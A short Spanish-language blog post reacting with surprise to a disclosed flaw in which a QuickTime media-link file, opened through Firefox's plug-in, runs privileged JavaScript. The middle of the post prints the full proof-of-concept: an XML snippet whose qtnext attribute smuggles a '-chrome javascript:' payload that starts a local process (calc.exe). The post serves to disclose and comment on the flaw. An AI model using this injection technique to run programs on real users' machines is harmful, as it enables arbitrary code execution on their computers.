Firefox+QuickTime == Agujero de seguridad

Disculpen si la entrada no me queda muy lucida (esto es, si me queda aún peor que de costumbre) pero es que aún estoy intentando cerrar la boca, que me acabo de quedar de piedra ante el agujero de seguridad más curioso que haya visto nunca. Y es que en una arquitectura de plug-ins cuanta más potencia (y el plug-in de QuickTime y Firefox son muy potentes juntos) más riesgo. Resulta que si el plug-in QuickTime abre un archivo cuya extensión reconoce (mp3, por ejemplo) y encuentra dentro código del estilo de

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome
javascript:file=Components.classes['@mozilla.org/file/local;1'].
createInstance(Components.interfaces.nsILocalFile);
file.initWithPath('c:\\windows\\system32\\calc.exe');
process=Components.classes['@mozilla.org/process/util;1'].
createInstance(Components.interfaces.nsIProcess);process.init(file);
process.run(true,[],0);void(0);"/>

(y se está ejecutando sobre Windows, y el archivo calc.exe está donde suele estar, se nos lanzará la calculadora de Windows. El potencial para hacer cosas más peligrosas es notable. Pero más que miedo, qué le vamos a hacer, lo que me provoca es sorpresa.

Sigo con la boca abierta…

Fuente, y más ejemplos y detalles: 0DAY: QuickTime pwns Firefox.